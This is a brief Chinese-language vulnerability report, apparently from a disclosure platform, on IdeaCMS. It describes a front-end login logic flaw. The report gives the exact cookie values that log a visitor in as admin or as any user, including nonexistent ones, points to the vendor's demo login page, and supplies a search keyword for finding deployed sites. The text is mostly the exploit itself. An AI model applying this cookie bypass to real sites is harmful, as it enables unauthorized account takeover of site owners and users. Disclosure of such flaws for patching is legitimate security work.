IdeaCMS建站系统通用漏洞 影响上万网站

IdeaCMS基于ASP+MSSQL/ACCESS的技术开发,自2008年发布第一个版本以来，我们每年都对程序做一次比较大的版本更新，至今已经发布了六个大版本。

IdeaCMS以简单、高效、灵活、易用、开源、模板新颖几大特点备受广大用户的青睐。通过admin5,chinaz等第三方平台下载量累计已经超过50万。部署网站超过100万。

官网：http://www.ideacms.net

百度关键字：Powered By IdeaCMS

该CMS系统前台用户登陆存在逻辑漏洞，可登陆任意用户（不存在的也可以） 神奇吧

官网演示：http://www.ideacms.net/demo6/plug/user/login.asp

来到登陆页面

添加Cookie:urole=%2D1; User=admin; RoleID=0;

即可登陆admin用户

成功登陆

也可以登录不存在的用户

登陆wooyunsec用户（该用户数据库中不存在，仍然可以继续登陆）